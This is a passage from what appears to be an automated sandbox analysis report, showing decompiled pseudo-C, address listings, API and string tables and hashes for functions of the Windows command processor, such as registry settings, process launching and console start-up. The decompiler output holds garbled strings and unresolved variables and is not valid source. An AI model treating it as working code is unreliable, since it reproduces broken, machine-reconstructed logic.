								if(RegQueryValueExW(_v4116, L"CompletionChar", _t176,  &_v4108,  &_v4104,  &_v4112) != 0) {
									L24:
									_v4112 = _t161;
									if(RegQueryValueExW(_v4116, L"PathCompletionChar", _t176,  &_v4108,  &_v4104,  &_v4112) != 0) {
										_t101 =  *0x4a5740a4; // 0x20
										L32:
										_t162 =  *0x4a5740a0; // 0x20
										_t174 = 0x20;
										if(_t162 != _t174) {
											_t181 = _t101 - _t174;
											L34:
											if(_t181 == 0 && _t162 < _t174) {
												 *0x4a5740a4 = _t162;
											}
											L36:
											_v4112 = _t161;
											if(RegQueryValueExW(_v4116, L"AutoRun", _t176,  &_v4108,  &_v4104,  &_v4112) == 0) {
												if(_v4108 == 2) {
													_t155 = _v4112 >> 1;
													_t177 = _t178 + _t155 * 2 - 0x1000;
													if(ExpandEnvironmentStringsW( &_v4104, _t178 + _t155 * 2 - 0x1000, 0x7fe - _t155) == 0) {
														_v4104 = 0;
													} else {
														E4A55185A( &_v4104, 0x800, _t177);
													}
													_t176 = 0;
												}
												if(_v4104 != _t176) {
													 *_v4120 = E4A5519D6( &_v4104);
												}
											}
											RegCloseKey(_v4116);
											goto L38;
										}
										if(_t101 < _t174) {
											 *0x4a5740a0 = _t101;
											goto L36;
										}
										goto L34;
									}
									if(_v4108 != 4) {
										if(_v4108 != 1) {
											_t101 =  *0x4a5740a4; // 0x20
											L28:
											if(_t101 == _t176 || _t101 == 0xd || _t101 > 0x20) {
												_t101 = 0x20;
												 *0x4a5740a4 = _t101;
											}
											goto L32;
										}
										_t101 = wcstol( &_v4104, _t176, _t176);
										_t179 = _t179 + 0xc;
										L27:
										 *0x4a5740a4 = _t101;
										goto L28;
									}
									_t101 = _v4104;
									goto L27;
								}
								if(_v4108 != 4) {
									if(_v4108 != 1) {
										_t135 =  *0x4a5740a0; // 0x20
										L20:
										if(_t135 == _t176 || _t135 == 0xd || _t135 > 0x20) {
											_t136 = 0x20;
											 *0x4a5740a0 = _t136;
										}
										goto L24;
									}
									_t135 = wcstol( &_v4104, _t176, _t176);
									_t179 = _t179 + 0xc;
									L19:
									 *0x4a5740a0 = _t135;
									goto L20;
								}
								_t135 = _v4104;
								goto L19;
							}
							if(_v4108 != 4) {
								if(_v4108 == 1) {
									_t139 = wcstol( &_v4104, _t176, _t176);
									_t179 = _t179 + 0xc;
									L15:
									 *0x4a57408a = _t139;
									goto L16;
								}
								goto L16;
							}
							_t139 = _v4104;
							goto L15;
						}
						if(_v4108 != 4) {
							if(_v4108 == 1) {
								_t144 =  &_v4104;
								__imp___wtol(_t144);
								asm("sbb al, al");
								_t147 =  ~(_t144 - 1) + 1;
								L10:
								 *0x4a574081 = _t147;
								goto L11;
							}
							goto L11;
						}
						_t147 = _t117 & 0xffffff00 | _v4104 != _t176;
						goto L10;
						L38:
						_v4120 = _v4120 + 4;
						_t62 =  &_v4124;
						 *_t62 = _v4124 - 1;
						if( *_t62 != 0) {
							_t165 = _v4128;
							continue;
						}
						__imp__time();
						srand(_t101);
						_t175 = _t176;
						_pop(_t176);
						_pop(_t161);
						goto L40;
					}
				}
			}








































                                0x4a557e1d
                                0x4a557e22
                                0x4a557e29
                                0x4a557e2c
                                0x4a557e31
                                0x4a557e35
                                0x4a557e3f
                                0x4a557e49
                                0x4a5580f9
                                0x4a558104
                                0x4a557e4f
                                0x4a557e56
                                0x4a557e58
                                0x4a557e58
                                0x4a557e5f
                                0x4a557e60
                                0x4a557e66
                                0x4a557e67
                                0x4a557e69
                                0x4a557e6a
                                0x4a557e70
                                0x4a557e76
                                0x4a557e7c
                                0x4a557e82
                                0x4a557e87
                                0x4a557e99
                                0x4a557ea4
                                0x4a557eac
                                0x00000000
                                0x00000000
                                0x4a557ed3
                                0x4a557ed9
                                0x4a557edf
                                0x4a557ee3
                                0x4a5664c6
                                0x4a5664da
                                0x00000000
                                0x00000000
                                0x4a5664e0
                                0x4a5664e7
                                0x4a5664f0
                                0x4a5664f3
                                0x4a5664f5
                                0x4a5664f5
                                0x00000000
                                0x4a5664f5
                                0x4a5664ce
                                0x00000000
                                0x4a5664ce
                                0x4a557ee9
                                0x4a557f0a
                                0x4a557f10
                                0x4a557f14
                                0x4a557f31
                                0x4a557f52
                                0x4a557f58
                                0x4a557f5c
                                0x4a566520
                                0x4a566534
                                0x00000000
                                0x00000000
                                0x4a56653a
                                0x4a566541
                                0x4a56654a
                                0x4a56654d
                                0x4a56654f
                                0x4a56654f
                                0x00000000
                                0x4a56654f
                                0x4a566528
                                0x00000000
                                0x4a566528
                                0x4a557f62
                                0x4a557f83
                                0x4a557f8d
                                0x4a557fa9
                                0x4a557fca
                                0x4a557fd4
                                0x4a55800a
                                0x4a55802b
                                0x4a558035
                                0x4a558261
                                0x4a55806f
                                0x4a55806f
                                0x4a558078
                                0x4a55807c
                                0x4a557e06
                                0x4a55808b
                                0x4a55808b
                                0x4a5665d1
                                0x4a5665d1
                                0x4a558096
                                0x4a5580b7
                                0x4a5580c1
                                0x4a5665e4
                                0x4a5665ec
                                0x4a5665f5
                                0x4a56660d
                                0x4a566625
                                0x4a56660f
                                0x4a56661c
                                0x4a56661c
                                0x4a56662c
                                0x4a56662c
                                0x4a566635
                                0x4a56664d
                                0x4a56664d
                                0x4a566635
                                0x4a5580cd
                                0x00000000
                                0x4a5580cd
                                0x4a558085
                                0x4a5665c6
                                0x00000000
                                0x4a5665c6
                                0x00000000
                                0x4a558085
                                0x4a558042
                                0x4a5665a2
                                0x4a5665bb
                                0x4a558055
                                0x4a558058
                                0x4a558068
                                0x4a558069
                                0x4a558069
                                0x00000000
                                0x4a558058
                                0x4a5665ad
                                0x4a5665b3
                                0x4a55804f
                                0x4a55804f
                                0x00000000
                                0x4a55804f
                                0x4a558048
                                0x00000000
                                0x4a558048
                                0x4a557fdd
                                0x4a566577
                                0x4a566590
                                0x4a557ff0
                                0x4a557ff3
                                0x4a558003
                                0x4a558004
                                0x4a558004
                                0x00000000
                                0x4a557ff3
                                0x4a566582
                                0x4a566588
                                0x4a557fea
                                0x4a557fea
                                0x00000000
                                0x4a557fea
                                0x4a557fe3
                                0x00000000
                                0x4a557fe3
                                0x4a557f96
                                0x4a558256
                                0x4a566562
                                0x4a566568
                                0x4a557fa3
                                0x4a557fa3
                                0x00000000
                                0x4a557fa3
                                0x00000000
                                0x4a55825c
                                0x4a557f9c
                                0x00000000
                                0x4a557f9c
                                0x4a557f1d
                                0x4a558244
                                0x4a5664ff
                                0x4a566506
                                0x4a56650f
                                0x4a566512
                                0x4a557f2c
                                0x4a557f2c
                                0x00000000
                                0x4a557f2c
                                0x00000000
                                0x4a55824a
                                0x4a557f29
                                0x00000000
                                0x4a5580d3
                                0x4a5580d3
                                0x4a5580da
                                0x4a5580da
                                0x4a5580e0
                                0x4a558232
                                0x00000000
                                0x4a558232
                                0x4a5580e7
                                0x4a5580ee
                                0x4a5580f6
                                0x4a5580f7
                                0x4a5580f8
                                0x00000000
                                0x4a5580f8
                                0x4a557e87

                                APIs
                                • RegOpenKeyExW.KERNEL32 ref: 4A557EA4
                                • RegQueryValueExW.KERNEL32(?,DisableUNCCheck,00000000,?,?,?), ref: 4A557EDF
                                • RegQueryValueExW.KERNEL32(?,EnableExtensions,00000000,00000001,?,?), ref: 4A557F10
                                • RegQueryValueExW.KERNEL32(?,DelayedExpansion,00000000,00000001,?,?), ref: 4A557F58
                                • RegQueryValueExW.KERNEL32(?,DefaultColor,00000000,00000001,?,?), ref: 4A557F89
                                • RegQueryValueExW.KERNEL32(?,CompletionChar,00000000,00000001,?,?), ref: 4A557FD0
                                • RegQueryValueExW.KERNEL32(?,PathCompletionChar,00000000,00000001,?,?), ref: 4A558031
                                • RegQueryValueExW.KERNEL32(?,AutoRun,00000000,00000004,?,?), ref: 4A5580BD
                                • RegCloseKey.KERNEL32(?), ref: 4A5580CD
                                • time.MSVCRT ref: 4A5580E7
                                • srand.MSVCRT ref: 4A5580EE
                                Strings
                                • DelayedExpansion, xrefs: 4A557F47
                                • CompletionChar, xrefs: 4A557FBF
                                • DisableUNCCheck, xrefs: 4A557EC8
                                • effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0, xrefs: 4A557E94
                                • PathCompletionChar, xrefs: 4A558020
                                • EnableExtensions, xrefs: 4A557EFF
                                • Software\Microsoft\Command Processor, xrefs: 4A557E9C
                                • DefaultColor, xrefs: 4A557F78
                                • AutoRun, xrefs: 4A5580AC
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: QueryValue$CloseOpensrandtime
                                • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor$effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0
                                • API String ID: 145004033-2439411126
                                • Opcode ID: 25f3165159f7e424ab9b812a43155839028a07dfbfd110cbc4a2e75cb6fe6f40
                                • Instruction ID: 5442292b0d19cdea8df7576ae778ec7ab5658a2cd52ebe013804d92b35194a00
                                • Opcode Fuzzy Hash: 25f3165159f7e424ab9b812a43155839028a07dfbfd110cbc4a2e75cb6fe6f40
                                • Instruction Fuzzy Hash: 60C164B58012A8EADB219B50CF44ADA7BBCFF09301F0049D7E689E6518D7749EC4DF64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A553E02, Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 327threadprocessstringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 69%
                                			E4A553E02(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				void* _t103;
				intOrPtr _t111;
				intOrPtr _t116;
				WCHAR* _t118;
				int _t119;
				long _t122;
				signed int _t126;
				int _t130;
				void* _t139;
				void* _t141;
				void* _t147;
				void* _t153;
				void* _t154;
				void* _t160;
				void* _t163;
				void* _t164;
				void* _t165;
				int _t170;
				int _t171;
				int _t175;
				WCHAR* _t176;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t189;
				void* _t190;
				void* _t198;
				int _t199;

				_t163 = __ecx;
				E4A5513E1(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t178 - 0x7c)) =  *((intOrPtr*)(_t178 + 8));
				 *(_t178 - 0x74) =  *(_t178 + 0x14);
				_t174 =  *(_t178 + 0x18);
				 *(_t178 - 0x68) =  *(_t178 + 0x18);
				 *((intOrPtr*)(_t178 - 0x84)) = 0;
				 *((intOrPtr*)(_t178 - 0x9c)) = 0;
				 *((intOrPtr*)(_t178 - 0x6c)) = 0;
				 *((intOrPtr*)(_t178 - 0x78)) = 0x20;
				_t170 = 1;
				_t97 = _t178 - 0x140;
				__imp__InitializeProcThreadAttributeList(_t97, 1, 0, _t178 - 0x78, 0x4a554098, 0x174);
				if(_t97 == 0) {
					 *0x4a574128 = GetLastError();
					E4A56065B(_t174, _t174);
					L34:
					L23:
					return E4A5513CA(0, _t170, _t174);
				}
				 *((intOrPtr*)(_t178 - 0x80)) = 1;
				_t103 = _t178 - 0x140;
				__imp__UpdateProcThreadAttribute(_t103, 0, 0x60001, _t178 - 0x80, 4, 0, 0);
				if(_t103 == 0) {
					 *0x4a574128 = GetLastError();
					E4A56065B(_t174, _t174);
					__imp__DeleteProcThreadAttributeList(_t178 - 0x140);
					goto L34;
				} else {
					_t175 = 0x48;
					memset(_t178 - 0xe4, 0, _t175);
					_t180 = _t179 + 0xc;
					 *((intOrPtr*)(_t178 - 0xa0)) = _t178 - 0x140;
					 *(_t178 - 0xe4) = _t175;
					 *((intOrPtr*)(_t178 - 0xd8)) =  *((intOrPtr*)(_t178 + 0x1c));
					 *((intOrPtr*)(_t178 - 0xd4)) = 0;
					 *((intOrPtr*)(_t178 - 0xd0)) = 1;
					_t111 = 0x64;
					 *((intOrPtr*)(_t178 - 0xcc)) = _t111;
					 *((intOrPtr*)(_t178 - 0xc8)) = _t111;
					 *((intOrPtr*)(_t178 - 0xb8)) = 0;
					 *(_t178 - 0xb4) = 1;
					 *(_t178 - 0x184) = 0x44;
					GetStartupInfoW(_t178 - 0x184);
					 *((intOrPtr*)(_t178 - 0xdc)) =  *((intOrPtr*)(_t178 - 0x17c));
					 *((intOrPtr*)(_t178 - 4)) = 0;
					_t174 = L"COPYCMD";
					if(E4A55321B(_t163, L"COPYCMD") == 0) {
						_t115 = E4A553AFC;
					}
					_t116 = E4A5519D6(_t115);
					 *((intOrPtr*)(_t178 - 0x6c)) = _t116;
					if(_t116 == 0) {
						L36:
						_push(0xfffffffe);
						_push(_t178 - 0x10);
						_push(0x4a5740ac);
						L4A57219B();
						goto L34;
					}
					_t189 =  *0x4a5740e0; // 0x0
					if(_t189 != 0) {
						L7:
						_t118 = E4A552148( *(_t178 - 0x68), 0x5c);
						if(_t118 != 0 && lstrcmpW(_t118, L"\\XCOPY.EXE") == 0) {
							E4A56CD7C(_t163, _t174, E4A559A54);
						}
						_t119 =  *0x4a5740b4; // 0x0
						if(_t119 == 0 ||  *((intOrPtr*)(_t119 + 0x30)) == 0) {
							L11:
							_t176 = 0x4a575260;
							_t119 = CreateProcessW( *(_t178 - 0x68),  *(_t178 - 0x74), 0, 0, _t170, 0x80000, 0, 0x4a575260, _t178 - 0xe4, _t178 - 0x98);
							goto L12;
						} else {
							_push(_t178 - 0x98);
							_push(_t178 - 0xe4);
							_t176 = 0x4a575260;
							_push(0x4a575260);
							_push(0);
							_push(0x80000);
							_push(_t170);
							_push(0);
							_push(0);
							_push( *(_t178 - 0x74));
							_push( *(_t178 - 0x68));
							_push( *((intOrPtr*)(_t119 + 0x30)));
							"^$WJh$WJr$WJ|$WJ"();
							L12:
							 *(_t178 - 0x64) = _t119;
							if(_t119 == 0) {
								_t122 = GetLastError();
								 *(_t178 - 0x70) = _t122;
								 *0x4a574128 = _t122;
							} else {
								 *(_t178 - 0x60) =  *(_t178 - 0x98);
								CloseHandle( *(_t178 - 0x94));
							}
							E4A551730(L"COPYCMD",  *((intOrPtr*)(_t178 - 0x6c)));
							if( *(_t178 - 0x64) == 0) {
								__eflags =  *0x4a574081; // 0x0
								if(__eflags == 0) {
									L42:
									__eflags =  *0x4a574128 - 0x2e4;
									if( *0x4a574128 != 0x2e4) {
										L51:
										__eflags =  *(_t178 - 0x64);
										if( *(_t178 - 0x64) != 0) {
											goto L15;
										}
										_t174 = E4A551896(0x208);
										__eflags = _t174;
										if(_t174 != 0) {
											E4A55185A(_t174, 0x104,  *(_t178 - 0x68));
											E4A56065B(_t174, _t174);
											E4A55142E(_t174);
										}
										goto L36;
									}
									L43:
									_t171 = 0x3c;
									_t147 = memset(_t178 - 0x120, 0, _t171);
									_t180 = _t180 + 0xc;
									 *(_t178 - 0x120) = _t171;
									 *((intOrPtr*)(_t178 - 0x11c)) = 0x8140;
									__imp__GetConsoleWindow();
									 *(_t178 - 0x118) = _t147;
									 *(_t178 - 0x110) =  *(_t178 - 0x68);
									 *((intOrPtr*)(_t178 - 0x10c)) =  *((intOrPtr*)( *((intOrPtr*)(_t178 - 0x7c)) + 0x3c));
									 *(_t178 - 0x108) = _t176;
									 *(_t178 - 0x104) =  *(_t178 - 0xb4) & 0x0000ffff;
									 *((intOrPtr*)(_t178 - 4)) = 1;
									_t153 =  *0x4a57403c(_t178 - 0x120);
									 *(_t178 - 0x64) = _t153;
									__eflags = _t153;
									if(_t153 == 0) {
										_t154 =  *(_t178 - 0x100);
										__eflags = _t154;
										if(_t154 != 0) {
											__eflags = _t154 - 0x20;
											if(_t154 != 0x20) {
												 *0x4a574128 = _t154;
											} else {
												 *0x4a574128 = 2;
											}
										} else {
											 *0x4a574128 = 8;
										}
									} else {
										 *(_t178 - 0x60) =  *(_t178 - 0xe8);
									}
									 *((intOrPtr*)(_t178 - 4)) = 0;
									_t170 = 1;
									__eflags = 1;
									goto L51;
								}
								__eflags =  *0x4a574128 - 0xc1;
								if( *0x4a574128 == 0xc1) {
									goto L43;
								}
								goto L42;
							} else {
								L15:
								_t164 =  *(_t178 - 0x60);
								_t174 = _t164 & _t170;
								_t126 = _t164 >> 0x00000001 & _t170;
								if(_t164 == 0) {
									L32:
									 *(_t178 + 0xc) = 4;
									L18:
									 *(_t178 - 0x70) = 0;
									 *0x4a5741bc = _t170;
									if( *(_t178 + 0xc) == 0) {
										_t130 = E4A553BE0(_t164, _t164);
										 *0x4a574188 = _t130;
										 *(_t178 - 0x60) = 0;
										_t170 = _t130;
										 *(_t178 - 0x70) = _t170;
										E4A55179D(_t178 - 0x5c, 0x14, L"%08X", _t170);
										E4A551730(L"=ExitCode", _t178 - 0x5c);
										_t53 = _t170 - 0x20; // -32
										if(_t53 <= 0x5e) {
											E4A55179D(_t178 - 0x34, 0xc, L"%01C", _t170);
											_push(_t178 - 0x34);
										} else {
											_push(E4A551794);
										}
										_push(L"=ExitCodeAscii");
										_t139 = E4A551730();
										if(_t174 != 0) {
											E4A56CF50(_t139);
										}
									} else {
										__eflags =  *(_t178 + 0xc) - 4;
										if( *(_t178 + 0xc) == 4) {
											__eflags = _t164;
											if(_t164 != 0) {
												CloseHandle(_t164);
												 *(_t178 - 0x60) = 0;
											}
										} else {
											__eflags =  *(_t178 + 0xc) - 2;
											if( *(_t178 + 0xc) == 2) {
												 *0x4a574180 = _t164;
											}
										}
									}
									 *((intOrPtr*)(_t178 - 4)) = 0xfffffffe;
									E4A5540C5();
									goto L23;
								}
								_t198 =  *0x4a574081; // 0x0
								if(_t198 == 0) {
									goto L18;
								}
								_t199 =  *0x4a5740b4; // 0x0
								if(_t199 == 0) {
									__eflags =  *0x4a5740e0; // 0x0
									if(__eflags != 0) {
										goto L18;
									}
									__eflags =  *0x4a5740e4; // 0x0
									if(__eflags != 0) {
										goto L18;
									}
									__eflags =  *(_t178 + 0xc);
									if( *(_t178 + 0xc) == 0) {
										__eflags = _t126;
										if(_t126 != 0) {
											goto L32;
										}
										_t141 = E4A56D7C9(0, _t164);
										_t165 = 2;
										__eflags = _t165 - _t141;
										_t164 =  *(_t178 - 0x60);
										if(_t165 == _t141) {
											goto L32;
										}
									}
								}
								goto L18;
							}
						}
					}
					_t190 =  *0x4a5740e4; // 0x0
					if(_t190 == 0) {
						_t160 =  *0x4a5740b4; // 0x0
						__eflags = _t160;
						if(_t160 != 0) {
							goto L7;
						}
						goto L11;
					}
					goto L7;
				}
			}
































                                0x4a553e02
                                0x4a553e0c
                                0x4a553e14
                                0x4a553e1a
                                0x4a553e1d
                                0x4a553e20
                                0x4a553e25
                                0x4a553e2b
                                0x4a553e31
                                0x4a553e34
                                0x4a553e42
                                0x4a553e44
                                0x4a553e4b
                                0x4a553e53
                                0x4a5656e4
                                0x4a5656ea
                                0x4a5656ef
                                0x4a55406c
                                0x4a554071
                                0x4a554071
                                0x4a553e59
                                0x4a553e6a
                                0x4a553e71
                                0x4a553e79
                                0x4a5656fc
                                0x4a565702
                                0x4a56570e
                                0x00000000
                                0x4a553e7f
                                0x4a553e81
                                0x4a553e8b
                                0x4a553e90
                                0x4a553e99
                                0x4a553e9f
                                0x4a553ea8
                                0x4a553eae
                                0x4a553eb4
                                0x4a553ebc
                                0x4a553ebd
                                0x4a553ec3
                                0x4a553ec9
                                0x4a553ed1
                                0x4a553ed8
                                0x4a553ee9
                                0x4a553ef5
                                0x4a553efb
                                0x4a553efe
                                0x4a553f0b
                                0x4a553f0d
                                0x4a553f0d
                                0x4a553f13
                                0x4a553f18
                                0x4a553f1d
                                0x4a565716
                                0x4a565716
                                0x4a56571b
                                0x4a56571c
                                0x4a565721
                                0x00000000
                                0x4a565726
                                0x4a553f23
                                0x4a553f29
                                0x4a553f37
                                0x4a553f3c
                                0x4a553f43
                                0x4a565731
                                0x4a565731
                                0x4a553f59
                                0x4a553f60
                                0x4a553f6b
                                0x4a553f79
                                0x4a553f8e
                                0x00000000
                                0x4a56573b
                                0x4a565741
                                0x4a565748
                                0x4a565749
                                0x4a56574e
                                0x4a56574f
                                0x4a565750
                                0x4a565755
                                0x4a565756
                                0x4a565757
                                0x4a565758
                                0x4a56575b
                                0x4a56575e
                                0x4a565761
                                0x4a553f94
                                0x4a553f94
                                0x4a553f99
                                0x4a56576c
                                0x4a565772
                                0x4a565775
                                0x4a553f9f
                                0x4a553fa5
                                0x4a553fae
                                0x4a553fae
                                0x4a553fbc
                                0x4a553fc4
                                0x4a56577f
                                0x4a565785
                                0x4a565793
                                0x4a565793
                                0x4a56579d
                                0x4a565873
                                0x4a565873
                                0x4a565876
                                0x00000000
                                0x00000000
                                0x4a565886
                                0x4a565888
                                0x4a56588a
                                0x4a565899
                                0x4a56589f
                                0x4a5658a5
                                0x4a5658a5
                                0x00000000
                                0x4a56588a
                                0x4a5657a3
                                0x4a5657a5
                                0x4a5657af
                                0x4a5657b4
                                0x4a5657b7
                                0x4a5657bd
                                0x4a5657c7
                                0x4a5657cd
                                0x4a5657d6
                                0x4a5657e2
                                0x4a5657e8
                                0x4a5657f5
                                0x4a5657fb
                                0x4a565809
                                0x4a56580f
                                0x4a565812
                                0x4a565814
                                0x4a565821
                                0x4a565827
                                0x4a565829
                                0x4a565837
                                0x4a56583a
                                0x4a565848
                                0x4a56583c
                                0x4a56583c
                                0x4a56583c
                                0x4a56582b
                                0x4a56582b
                                0x4a56582b
                                0x4a565816
                                0x4a56581c
                                0x4a56581c
                                0x4a56586d
                                0x4a565872
                                0x4a565872
                                0x00000000
                                0x4a565872
                                0x4a565787
                                0x4a565791
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a553fca
                                0x4a553fca
                                0x4a553fca
                                0x4a553fcf
                                0x4a553fd5
                                0x4a553fd9
                                0x4a55ceaf
                                0x4a55ceaf
                                0x4a553ff3
                                0x4a553ff3
                                0x4a553ff6
                                0x4a553fff
                                0x4a554006
                                0x4a55400b
                                0x4a554010
                                0x4a554013
                                0x4a554015
                                0x4a554024
                                0x4a554035
                                0x4a55403a
                                0x4a554040
                                0x4a5658e6
                                0x4a5658f1
                                0x4a554046
                                0x4a554046
                                0x4a554046
                                0x4a55404b
                                0x4a554050
                                0x4a554057
                                0x4a5658f7
                                0x4a5658f7
                                0x4a55ce7e
                                0x4a55ce7e
                                0x4a55ce82
                                0x4a565901
                                0x4a565903
                                0x4a56590a
                                0x4a565910
                                0x4a565910
                                0x4a55ce88
                                0x4a55ce88
                                0x4a55ce8c
                                0x4a55ce92
                                0x4a55ce92
                                0x4a55ce8c
                                0x4a55ce82
                                0x4a55405d
                                0x4a554064
                                0x00000000
                                0x4a554069
                                0x4a553fdf
                                0x4a553fe5
                                0x00000000
                                0x00000000
                                0x4a553fe7
                                0x4a553fed
                                0x4a5575c3
                                0x4a5575c9
                                0x00000000
                                0x00000000
                                0x4a5575cf
                                0x4a5575d5
                                0x00000000
                                0x00000000
                                0x4a5658af
                                0x4a5658b2
                                0x4a5658b8
                                0x4a5658ba
                                0x00000000
                                0x00000000
                                0x4a5658c1
                                0x4a5658c8
                                0x4a5658c9
                                0x4a5658cc
                                0x4a5658cf
                                0x00000000
                                0x00000000
                                0x4a5658d5
                                0x4a5658b2
                                0x00000000
                                0x4a553fed
                                0x4a553fc4
                                0x4a553f60
                                0x4a553f2b
                                0x4a553f31
                                0x4a55ce9d
                                0x4a55cea2
                                0x4a55cea4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55ceaa
                                0x00000000
                                0x4a553f31

                                APIs
                                • InitializeProcThreadAttributeList.KERNEL32(?,00000001,00000000,00000020), ref: 4A553E4B
                                • UpdateProcThreadAttribute.KERNEL32(?,00000000,00060001,?,00000004,00000000,00000000), ref: 4A553E71
                                • memset.MSVCRT ref: 4A553E8B
                                • GetStartupInfoW.KERNEL32(00000044), ref: 4A553EE9
                                  • Part of subcall function 4A55321B: _wcsnicmp.MSVCRT ref: 4A55329D
                                • lstrcmpW.KERNEL32(00000000,\XCOPY.EXE,?,0000005C,00000000,COPYCMD), ref: 4A553F4B
                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00080000,00000000,4A575260,?,?), ref: 4A553F8E
                                • CloseHandle.KERNEL32(?), ref: 4A553FAE
                                • GetLastError.KERNEL32 ref: 4A5656DE
                                • GetLastError.KERNEL32 ref: 4A5656F6
                                • DeleteProcThreadAttributeList.KERNEL32(?,?), ref: 4A56570E
                                • _local_unwind4.MSVCRT ref: 4A565721
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AttributeProcThread$ErrorLastList$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_local_unwind4_wcsnicmplstrcmpmemset
                                • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$^$WJh$WJr$WJ|$WJ
                                • API String ID: 2658032697-4118603509
                                • Opcode ID: b51035f10f02e0cfe0b7f09d77ba1264e199d6349d75871269217ddd0ca3693c
                                • Instruction ID: a2d5e34d39e8bc1387a8ae7ff961b70a808ae7afed9d8436cacb144438746f0d
                                • Opcode Fuzzy Hash: b51035f10f02e0cfe0b7f09d77ba1264e199d6349d75871269217ddd0ca3693c
                                • Instruction Fuzzy Hash: C8C16BB5C01219EBDB21EFA5CA84ADDBBB8BF49314F50456BE60DEB618D7304A84CF11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5584E3, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 225memorylibraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E4A5584E3(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v72;
				intOrPtr* _v76;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t21;
				WCHAR* _t29;
				struct HINSTANCE__* _t44;
				intOrPtr* _t48;
				intOrPtr* _t60;
				int _t65;
				int _t70;
				void* _t72;
				void* _t73;
				short* _t77;
				WCHAR** _t80;
				short _t84;
				void* _t85;
				intOrPtr _t88;
				signed int _t91;
				void* _t92;
				void* _t102;

				_t19 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t19 ^ _t91;
				_t87 = _a4;
				_v76 = _a4;
				if(_a8 < 3) {
					_t21 = 0;
					goto L16;
				} else {
					 *0x4a5741a4 = 0x4a574220;
					InitializeCriticalSection(0x4a574220);
					E4A551E6C(0x4a574220);
					SetConsoleCtrlHandler(E4A56E72A, 1);
					E4A551605();
					E4A557AF3();
					E4A557E13(_t87, _a8);
					_t88 = GetCommandLineW;
					_t29 = GetCommandLineW();
					_t6 =  &(_t29[1]); // 0x2
					_t77 = _t6;
					do {
						_t84 =  *_t29;
						_t29 =  &(_t29[1]);
					} while (_t84 != 0);
					_push(_t85);
					_t86 = 0x2000;
					if((_t29 - _t77 >> 1) + 1 > 0x2000) {
						_push(0);
						_push(0x400023df);
						E4A556D44(_t77);
						_push(1);
						L29:
						_t35 = E4A5572E9(_t86, _t88);
						L30:
						_t80 =  *0x4a5741a8; // 0x0
						 *_t80 = _t35;
						L9:
						_t102 =  *0x4a5740e4 - _t86; // 0x0
						if(_t102 == 0) {
							_t35 = E4A554490(_t35, 1);
							__eflags = _t35;
							if(_t35 == 0) {
								goto L10;
							}
							__eflags =  *0x4a57408a - _t86; // 0x0
							if(__eflags != 0) {
								L26:
								_push( *0x4a57408a & 0x0000ffff);
								_t35 = E4A560AF9();
								goto L10;
							}
							_t35 = GetConsoleScreenBufferInfo(GetStdHandle(0xfffffff5),  &_v100);
							__eflags = _t35;
							if(_t35 != 0) {
								_t35 = _v100.wAttributes;
								 *0x4a57408a = _v100.wAttributes;
							}
							__eflags =  *0x4a57408a - _t86; // 0x0
							if(__eflags == 0) {
								goto L10;
							} else {
								goto L26;
							}
						}
						L10:
						if( *((intOrPtr*)(_t88 + 8)) == _t86) {
							_t73 = E4A56E3E9(_t35, L"%WINDOWS_COPYRIGHT%", _t86);
							E4A55D3B3( &_v72, 0x20);
							E4A5599E1(_t80, 0x2350, 1,  &_v72);
							_push(0x4a5745a8);
							E4A5558F3();
							__eflags = _t73 - _t86;
							if(_t73 == _t86) {
								_push(_t86);
								E4A556D44(_t80);
								_t80 = 8;
							} else {
								E4A5558F3(E4A552CB4, _t73);
								_push(0x4a5745a8);
								E4A5558F3();
							}
							GlobalFree(_t73);
							__eflags =  *0x4a590670;
							if( *0x4a590670 == 0) {
								__eflags =  *0x4a574081;
								if( *0x4a574081 != 0) {
									_push(_t86);
									_push(0x4000239f);
									E4A5599E1(_t80);
								}
							}
						}
						_t44 = GetModuleHandleW(L"KERNEL32.DLL");
						_t87 = GetProcAddress;
						 *0x4a574094 = _t44;
						 *0x4a5741ec = GetProcAddress(_t44, "CopyFileExW");
						 *0x4a5741e4 = GetProcAddress( *0x4a574094, "IsDebuggerPresent");
						 *0x4a5741f4 = GetProcAddress( *0x4a574094, "SetConsoleInputExeNameW");
						_t48 = _v76;
						_pop(_t72);
						if( *_t48 != _t86 ||  *((intOrPtr*)(_t48 + 4)) != _t86 ||  *((intOrPtr*)(_t48 + 8)) != _t86) {
							_t21 = 1;
						} else {
							_t21 = 0;
						}
